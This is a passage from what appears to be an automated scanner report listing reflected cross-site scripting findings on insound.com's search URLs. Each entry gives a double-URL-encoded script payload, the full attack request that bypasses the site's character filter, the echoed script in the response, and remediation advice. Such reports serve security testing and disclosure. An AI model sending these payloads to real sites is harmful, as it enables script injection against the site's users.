Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mamlob44rgorbm2hkkercahnt1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=320514291; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=543169460; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathalie Nordnesa331b</title><script>alert(1)</script>0de9c568909</title>
...[SNIP]...

1.195. http://www.insound.com/search/query/Nathan%20Delfs&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Delfs&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c7742ab54 was submitted in the REST URL parameter 3. This input was echoed as 4e3b7"><script>alert(1)</script>24c7742ab54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Delfs4e3b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c7742ab54&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vg1a58190o5vvv4hplkotqa071; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=180485677; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=226670441; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathan Delfs4e3b7"><script>alert(1)</script>24c7742ab54" />
...[SNIP]...

1.196. http://www.insound.com/search/query/Nathan%20Delfs&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Delfs&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c42fb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0122504e990 was submitted in the REST URL parameter 3. This input was echoed as c42fb</title><script>alert(1)</script>0122504e990 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Delfsc42fb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0122504e990&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9lq5akautt8dca1dsjf78c1e26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=268961556; expires=Sun, 09-Jan-2011 02:38:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=44299893; expires=Sun, 09-Jan-2011 02:38:28 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathan Delfsc42fb</title><script>alert(1)</script>0122504e990</title>
...[SNIP]...

1.197. http://www.insound.com/search/query/Nathan%20Fake&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Fake&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 67dea%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d4bb80bd21 was submitted in the REST URL parameter 3. This input was echoed as 67dea</title><script>alert(1)</script>8d4bb80bd21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Fake67dea%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d4bb80bd21&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9gmqdo8smsqpk40i88231kd2t2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=28101765; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=42005615; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathan Fake67dea</title><script>alert(1)</script>8d4bb80bd21</title>
...[SNIP]...

1.198. http://www.insound.com/search/query/Nathan%20Fake&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Fake&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9667a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e591e7ab48cc was submitted in the REST URL parameter 3. This input was echoed as 9667a"><script>alert(1)</script>591e7ab48cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Fake9667a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e591e7ab48cc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ehqgriic2se7hup7dkmjjf5gr7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=36022677; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=443328397; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathan Fake9667a"><script>alert(1)</script>591e7ab48cc" />
...[SNIP]...

1.199. http://www.insound.com/search/query/Nathan%20Larson&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Larson&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2c4937a327 was submitted in the REST URL parameter 3. This input was echoed as b2f47"><script>alert(1)</script>e2c4937a327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Larsonb2f47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2c4937a327&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vcd0t91bmcfbbotqummfu9s7k1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=206753961; expires=Sun, 09-Jan-2011 02:38:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=212603285; expires=Sun, 09-Jan-2011 02:38:24 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathan Larsonb2f47"><script>alert(1)</script>e2c4937a327" />
...[SNIP]...

1.200. http://www.insound.com/search/query/Nathan%20Larson&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Larson&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 1b81c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec306b7ef72c was submitted in the REST URL parameter 3. This input was echoed as 1b81c</title><script>alert(1)</script>c306b7ef72c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Larson1b81c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec306b7ef72c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=e0nj2scu8jrknc1p5tj4d10th1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=41165103; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=485865613; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathan Larson1b81c</title><script>alert(1)</script>c306b7ef72c</title>
...[SNIP]...

1.201. http://www.insound.com/search/query/Nathan%20Michel&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Michel&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload ab9ec%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20af953ef42 was submitted in the REST URL parameter 3. This input was echoed as ab9ec</title><script>alert(1)</script>20af953ef42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Michelab9ec%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20af953ef42&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uhlu7qc2kr9r6m17hl51g9pcb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:31 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=148653569; expires=Sun, 09-Jan-2011 02:38:31 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=451007205; expires=Sun, 09-Jan-2011 02:38:31 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathan Michelab9ec</title><script>alert(1)</script>20af953ef42</title>
...[SNIP]...

1.202. http://www.insound.com/search/query/Nathan%20Michel&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathan%20Michel&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed64e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e091edb0f64d was submitted in the REST URL parameter 3. This input was echoed as ed64e"><script>alert(1)</script>091edb0f64d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathan%20Micheled64e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e091edb0f64d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vt7uf0qrc9nfq1nr5qb3b1rju6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=470494864; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=88003662; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathan Micheled64e"><script>alert(1)</script>091edb0f64d" />
...[SNIP]...

1.203. http://www.insound.com/search/query/Nathaniel%20Rateliff%20&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathaniel%20Rateliff%20&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 28cc4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1307becdcb7 was submitted in the REST URL parameter 3. This input was echoed as 28cc4</title><script>alert(1)</script>1307becdcb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathaniel%20Rateliff%2028cc4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1307becdcb7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=v4vbvmtcknb2ulkbdsg7f0qqv0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=334838968; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=440887943; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathaniel Rateliff 28cc4</title><script>alert(1)</script>1307becdcb7</title>
...[SNIP]...

1.204. http://www.insound.com/search/query/Nathaniel%20Rateliff%20&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathaniel%20Rateliff%20&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0b63a131d17 was submitted in the REST URL parameter 3. This input was echoed as 84e47"><script>alert(1)</script>0b63a131d17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathaniel%20Rateliff%2084e47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0b63a131d17&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c6dduf7ubdfjct086eh4lht050; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=443804040; expires=Sun, 09-Jan-2011 02:38:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=104156110; expires=Sun, 09-Jan-2011 02:38:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathaniel Rateliff 84e47"><script>alert(1)</script>0b63a131d17" />
...[SNIP]...

1.205. http://www.insound.com/search/query/Nation%20of%20Ulysses&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nation%20of%20Ulysses&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b7e20%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3058b1d6de was submitted in the REST URL parameter 3. This input was echoed as b7e20</title><script>alert(1)</script>a3058b1d6de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nation%20of%20Ulyssesb7e20%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3058b1d6de&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vcgvq4a9uh7m1d83q60a0hlm11; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:34 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=89437443; expires=Sun, 09-Jan-2011 02:38:34 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=408093129; expires=Sun, 09-Jan-2011 02:38:34 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nation of Ulyssesb7e20</title><script>alert(1)</script>a3058b1d6de</title>
...[SNIP]...

1.206. http://www.insound.com/search/query/Nation%20of%20Ulysses&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nation%20of%20Ulysses&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9e0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87da78ad881 was submitted in the REST URL parameter 3. This input was echoed as d9e0a"><script>alert(1)</script>87da78ad881 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

